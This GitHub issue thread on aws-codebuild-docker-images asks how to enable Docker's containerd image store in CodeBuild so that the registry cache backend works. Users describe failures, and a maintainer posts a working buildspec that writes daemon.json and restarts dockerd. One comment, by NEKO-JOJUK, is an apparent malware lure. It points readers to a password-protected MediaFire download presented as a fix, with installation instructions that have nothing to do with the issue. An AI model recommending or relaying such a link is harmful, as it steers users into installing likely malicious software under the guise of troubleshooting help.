### ISSUE TITLE
Support enabling containerd image store

### ISSUE THREAD

**Issue by daniel-amag** [aws/aws-codebuild-docker-images#736]
After the update from Docker v23 to Docker v26 the default docker driver currently supports the registry cache backend but only when [containerd image store is enabled](https://docs.docker.com/build/cache/backends/). The default docker driver is a lot faster than the container driver when you need to use the --load flag. 

I've tried enabling this by creating a daemon config file with
```json
{
  "features": {
    "containerd-snapshotter": true
  }
}
```
and then instructing the daemon to use it upon restart but it doesn't seem to work.
`nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://127.0.0.1:2375 --experimental --config-file /etc/docker/daemon.json &`

This will always give this error if I try to build with the registry cache backend:

```
ERROR: Cache export is not supported for the docker driver.
--
282 | Switch to a different driver, or turn on the containerd image store, and try again.
283 | Learn more at https://docs.docker.com/go/build-cache-backends/
```

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by BwL1289** [comment]
I am completely blocked by codebuild not utilizing `containerd`. Large images w/ many layers simply won't work in codebuild without it and will fail either on provisioning stage due to `max layers exceeded`, or if you're pulling a docker image inside codebuild, will also fail with `max layers exceeded`. 

This is a critical to implement.

**Comment by BwL1289** [comment]
To make matters worse, if you are using cdk pipelines, your entire build flow will not work even if one image with the above error occurs. This needs to be fixed.

**Comment by xinyu-aws** [comment]
You'll need to restart docker daemon after configuring docker daemon. 

Example buildspec. Using latest ubuntu:7.0 in privileged build.
```
version: 0.2

phases:
  install:
    commands:
      - echo "Configure Docker Daemon"
      - mkdir -p /etc/docker
      - "echo '{\n  \"features\": {\n    \"containerd-snapshotter\": true\n  }\n}' > /etc/docker/daemon.json"
      - echo "Restart Docker Daemon"
      - kill $(cat /var/run/docker.pid) && rm -rf /var/run/docker.pid
      - nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://127.0.0.1:2375 --storage-driver=overlay2 &
      - timeout 20 sh -c "until docker info; do echo .; sleep 1; done"
  build:
    commands:
      - docker info
```

docker info returns
```
 Storage Driver: overlay2
  driver-type: io.containerd.snapshotter.v1
```
